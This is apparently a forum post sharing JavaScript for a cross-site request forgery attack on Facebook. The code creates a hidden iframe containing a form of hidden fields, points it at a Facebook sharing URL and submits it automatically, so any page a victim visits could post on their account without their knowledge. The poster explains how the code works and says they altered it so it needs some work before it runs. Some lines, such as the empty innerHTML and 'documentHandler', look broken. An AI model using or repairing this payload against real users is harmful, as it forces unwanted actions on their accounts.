XSS / CSFR Facebook hostile-page | Bitcointalksearch.org

Sharing the part that does the CSRF here, for those who are interested...

Code:

function jacks(site,params){
	var div = document.createElement('div');
	div.innerHTML = '';
	document.body.appendChild(div);
	var iframe = div.firstChild;
	var iframeDocument = iframe.documentHandler;
	iframeDocument.open();
	iframeDocument.close();
	var form = iframeDocument.createElement('form');
	iframeDocument.body.appendChild(form);
	form.setAttribute('action',site);
	for (param in params){
		var field = iframeDocument.createElement('input');
		field.setAttribute('type', 'hidden');
		field.setAttribute('name', param);
		field.setAttribute('value', params[param]);
		form.appendChild(field);
	}
	form.submit();
}

What this code roughly does is creating an iframe with a form that is set to a specific Facebook sharing URL (that is also called by their on-site sharing functionality), inserting a specific set of "parameters" (form fields) and corresponding values, and automatically submits the forum. This is all done in the background of course. The target URL and parameters can be specified in this function.

The code I posted here was edited to need some work before it works, to discourage script kiddies.

EDIT: Of course this could be executed from any page. You could be visiting some random page with comics, and it could technically have this code in it.

Topic: XSS / CSFR Facebook hostile-page (Read 1041 times)